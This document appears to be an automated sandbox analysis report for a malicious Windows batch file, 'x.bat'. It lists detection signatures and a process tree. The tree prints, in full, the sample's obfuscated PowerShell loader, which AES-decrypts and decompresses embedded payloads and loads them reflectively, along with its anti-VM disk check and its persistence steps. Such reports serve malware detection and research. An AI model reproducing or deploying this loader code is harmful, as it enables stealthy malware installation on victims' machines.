Edit tour
Windows
Analysis Report
x.bat
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2084 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\x.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3684 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 5752 cmdline:
wmic diskd rive get M odel MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 1852 cmdline:
findstr /i /c:"DADY HARDDISK" /c:"WDS100 T2B0A" /c: "QEMU HARD DISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 3592 cmdline:
cmd.exe /c echo func tion aQLUy ($yReKm){ $FiuGL=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $FiuGL. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $FiuGL. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ FiuGL.Key= [System.Co nvert]::Fr omBase64St ring('Yeb/ NAcCgrTp64 tTdeVgDdug i9XnGFjFK2 NDoLygP24= '); $FiuGL .IV=[Syste m.Convert] ::FromBase 64String(' lhLiL9MPOA HIRlkYn9z7 VA=='); $e xYAh=$FiuG L.CreateDe cryptor(); $YgVOo=$e xYAh.Trans formFinalB lock($yReK m, 0, $yRe Km.Length) ; $exYAh.D ispose(); $FiuGL.Dis pose(); $Y gVOo;}func tion mFHoz ($yReKm){ Invoke-Exp ression '$ HdeTZ=New- Object *S* y*s*t*e*m* .*I*O*.M*e m*or*yS*tr *ea*m(,$yR eKm);'.Rep lace('*', ''); Invok e-Expressi on '$wKYjD =New-Objec t *S*y*s*t *e*m*.*I*O *.*M*e*m*o *r*y*S*t*r *e*a*m*;'. Replace('* ', ''); In voke-Expre ssion '$od kuT=New-Ob ject S*y*s *t*e*m*.*I *O*.C*om*p r*e*ss*io* n.*GZ*ip*S t*re*am*($ HdeTZ, [IO .C*om*pr*e s*si*on*.C o*mp*re*ss *i*o*n*Mod e]::D*e*c* omp*re*ss) ;'.Replace ('*', ''); $odkuT.Co pyTo($wKYj D); $odkuT .Dispose() ; $HdeTZ.D ispose(); $wKYjD.Dis pose(); $w KYjD.ToArr ay();}func tion tnqry ($yReKm,$V DCUY){ Inv oke-Expres sion '$KyI ng=[*S*y*s *t*e*m*.*R *e*fl*ect* io*n.*As*s e*mb*l*y*] ::L*o*a*d* ([byte[]]$ yReKm);'.R eplace('*' , ''); Inv oke-Expres sion '$Tcv Qt=$KyIng. *E*n*t*r*y *P*o*i*n*t *;'.Replac e('*', '') ; Invoke-E xpression '$TcvQt.*I *n*v*o*k*e *($null, $ VDCUY);'.R eplace('*' , '');}$yF DGP = 'C:\ Users\user \Desktop\x .bat';$hos t.UI.RawUI .WindowTit le = $yFDG P;$blPNL=[ System.IO. File]::Rea dAllText($ yFDGP).Spl it([Enviro nment]::Ne wLine);for each ($nqZ fK in $blP NL) { if ( $nqZfK.Sta rtsWith('t dfVh')) { $ZaBDo=$nq ZfK.Substr ing(5); br eak; }}$ou iFf=[strin g[]]$ZaBDo .Split('\' );Invoke-E xpression '$pcr = mF Hoz (aQLUy ([*C*o*n* v*e*r*t]:: *F*r*o*m*B *a*s*e*6*4 *S*tr*i*n* g($ouiFf[0 ].Replace( "#", "/"). Replace("@ ", "A")))) ;'.Replace ('*', ''); Invoke-Exp ression '$ aZk = mFHo z (aQLUy ( [*C*o*n*v* e*r*t]::*F *r*o*m*B*a *s*e*6*4*S *tr*i*n*g( $ouiFf[1]. Replace("# ", "/").Re place("@", "A"))));' .Replace(' *', '');In voke-Expre ssion '$fE m = mFHoz (aQLUy ([* C*o*n*v*e* r*t]::*F*r *o*m*B*a*s *e*6*4*S*t r*i*n*g($o uiFf[2].Re place("#", "/").Repl ace("@", " A"))));'.R eplace('*' , '');tnqr y $pcr $nu ll;tnqry $ aZk $null; tnqry $fEm (,[string []] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 3524 cmdline:
powershell .exe -Wind owStyle Hi dden MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - dllhost.exe (PID: 5016 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{6e38c7 6f-48eb-48 7e-9cfd-61 76ccb652b5 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - winlogon.exe (PID: 552 cmdline:
winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - dllhost.exe (PID: 412 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{5004ad c4-d516-4e c2-8626-95 98e9dad3bc } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - svchost.exe (PID: 2036 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s S hellHWDete ction MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - spoolsv.exe (PID: 1932 cmdline:
C:\Windows \System32\ spoolsv.ex e MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F) - svchost.exe (PID: 2064 cmdline:
C:\Windows \system32\ svchost.ex e -k appmo del -p -s StateRepos itory MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 2152 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s WinHttpAu toProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - lsass.exe (PID: 628 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 920 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 988 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 364 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 356 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 696 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 592 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1044 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1084 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1200 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1252 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1296 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s EventS ystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1316 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s T hemes MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1408 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1488 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1496 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S ENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1552 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s AudioEndpo intBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1572 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s FontCa che MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1652 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s DispBr okerDeskto pSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1724 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p -s NlaS vc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1824 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s netpro fm MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1840 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1940 cmdline:
C:\Windows \system32\ svchost.ex e -k Netwo rkService -p -s Dnsc ache MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1948 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1956 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - cmd.exe (PID: 6756 cmdline:
"C:\Window s\System32 \cmd.exe" /C type C: \Users\use r\Desktop\ x.bat>C:\W indows\$rb x-onimai2\ $rbx-CO2.b at MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4088 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Wind ows\$rbx-o nimai2\$rb x-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6996 cmdline:
wmic diskd rive get M odel MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 6072 cmdline:
findstr /i /c:"DADY HARDDISK" /c:"WDS100 T2B0A" /c: "QEMU HARD DISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 1368 cmdline:
cmd.exe /c echo func tion aQLUy ($yReKm){ $FiuGL=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $FiuGL. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $FiuGL. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ FiuGL.Key= [System.Co nvert]::Fr omBase64St ring('Yeb/ NAcCgrTp64 tTdeVgDdug i9XnGFjFK2 NDoLygP24= '); $FiuGL .IV=[Syste m.Convert] ::FromBase 64String(' lhLiL9MPOA HIRlkYn9z7 VA=='); $e xYAh=$FiuG L.CreateDe cryptor(); $YgVOo=$e xYAh.Trans formFinalB lock($yReK m, 0, $yRe Km.Length) ; $exYAh.D ispose(); $FiuGL.Dis pose(); $Y gVOo;}func tion mFHoz ($yReKm){ Invoke-Exp ression '$ HdeTZ=New- Object *S* y*s*t*e*m* .*I*O*.M*e m*or*yS*tr *ea*m(,$yR eKm);'.Rep lace('*', ''); Invok e-Expressi on '$wKYjD =New-Objec t *S*y*s*t *e*m*.*I*O *.*M*e*m*o *r*y*S*t*r *e*a*m*;'. Replace('* ', ''); In voke-Expre ssion '$od kuT=New-Ob ject S*y*s *t*e*m*.*I *O*.C*om*p r*e*ss*io* n.*GZ*ip*S t*re*am*($ HdeTZ, [IO .C*om*pr*e s*si*on*.C o*mp*re*ss *i*o*n*Mod e]::D*e*c* omp*re*ss) ;'.Replace ('*', ''); $odkuT.Co pyTo($wKYj D); $odkuT .Dispose() ; $HdeTZ.D ispose(); $wKYjD.Dis pose(); $w KYjD.ToArr ay();}func tion tnqry ($yReKm,$V DCUY){ Inv oke-Expres sion '$KyI ng=[*S*y*s *t*e*m*.*R *e*fl*ect* io*n.*As*s e*mb*l*y*] ::L*o*a*d* ([byte[]]$ yReKm);'.R eplace('*' , ''); Inv oke-Expres sion '$Tcv Qt=$KyIng. *E*n*t*r*y *P*o*i*n*t *;'.Replac e('*', '') ; Invoke-E xpression '$TcvQt.*I *n*v*o*k*e *($null, $ VDCUY);'.R eplace('*' , '');}$yF DGP = 'C:\ Windows\$r bx-onimai2 \$rbx-CO2. bat';$host .UI.RawUI. WindowTitl e = $yFDGP ;$blPNL=[S ystem.IO.F ile]::Read AllText($y FDGP).Spli t([Environ ment]::New Line);fore ach ($nqZf K in $blPN L) { if ($ nqZfK.Star tsWith('td fVh')) { $ ZaBDo=$nqZ fK.Substri ng(5); bre ak; }}$oui Ff=[string []]$ZaBDo. Split('\') ;Invoke-Ex pression ' $pcr = mFH oz (aQLUy ([*C*o*n*v *e*r*t]::* F*r*o*m*B* a*s*e*6*4* S*tr*i*n*g ($ouiFf[0] .Replace(" #", "/").R eplace("@" , "A")))); '.Replace( '*', '');I nvoke-Expr ession '$a Zk = mFHoz (aQLUy ([ *C*o*n*v*e *r*t]::*F* r*o*m*B*a* s*e*6*4*S* tr*i*n*g($ ouiFf[1].R eplace("#" , "/").Rep lace("@", "A"))));'. Replace('* ', '');Inv oke-Expres sion '$fEm = mFHoz ( aQLUy ([*C *o*n*v*e*r *t]::*F*r* o*m*B*a*s* e*6*4*S*tr *i*n*g($ou iFf[2].Rep lace("#", "/").Repla ce("@", "A "))));'.Re place('*', '');tnqry $pcr $nul l;tnqry $a Zk $null;t nqry $fEm (,[string[ ]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 4544 cmdline:
powershell .exe -Wind owStyle Hi dden MD5: 04029E121A0CFA5991749937DD22A1D9) - schtasks.exe (PID: 6816 cmdline:
"C:\Window s\System32 \schtasks. exe" /Dele te /TN "$r bx-CNT1" / F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 3412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IfMUlU.exe (PID: 6964 cmdline:
"C:\Window s\$nya-oni mai2\IfMUl U.exe" MD5: B943A57BDF1BBD9C33AB0D33FF885983)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |